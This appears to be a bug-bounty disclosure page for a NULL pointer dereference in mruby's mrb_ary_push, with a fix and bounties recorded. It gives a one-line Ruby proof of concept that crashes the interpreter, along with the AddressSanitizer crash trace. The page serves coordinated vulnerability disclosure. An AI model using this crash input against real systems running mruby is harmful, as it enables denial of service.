NULL Pointer Dereference in mruby/mruby

Valid

Reported on

Oct 17th 2021

Description

SEGV on mrb_ary_push

Proof of Concept

1.times{ 0 [*0,o:0 ]= {} [[]] and 0 }

Result

~/asan/mruby/bin/mruby crash.rb
AddressSanitizer:DEADLYSIGNAL
=================================================================
==68494==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000011 (pc 0x560ae5baa377 bp 0x7ffdc8f38fe0 sp 0x7ffdc8f38f30 T0)
==68494==The signal is caused by a READ memory access.
==68494==Hint: address points to the zero page.
    #0 0x560ae5baa376 in mrb_ary_push /root/asan/mruby/src/array.c:497
    #1 0x560ae5b7eb4e in mrb_vm_exec /root/asan/mruby/src/vm.c:2624
    #2 0x560ae5b5c5a8 in mrb_vm_run /root/asan/mruby/src/vm.c:1070
    #3 0x560ae5ba5574 in mrb_top_run /root/asan/mruby/src/vm.c:3031
    #4 0x560ae5bfebfd in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6868
    #5 0x560ae5bfeeeb in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6911
    #6 0x560ae5b00092 in main /root/asan/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
    #7 0x7f09cba160b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #8 0x560ae5afd42d in _start (/root/asan/mruby/bin/mruby+0xbd42d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/asan/mruby/src/array.c:497 in mrb_ary_push
==68494==ABORTING

We have contacted a member of the mruby team and are waiting to hear back 2 years ago

Yukihiro "Matz" Matsumoto validated this vulnerability 2 years ago

felling good man has been awarded the disclosure bounty

The fix bounty is now up for grabs

Yukihiro "Matz" Matsumoto marked this as fixed with commit de2b4b 2 years ago

Yukihiro "Matz" Matsumoto has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation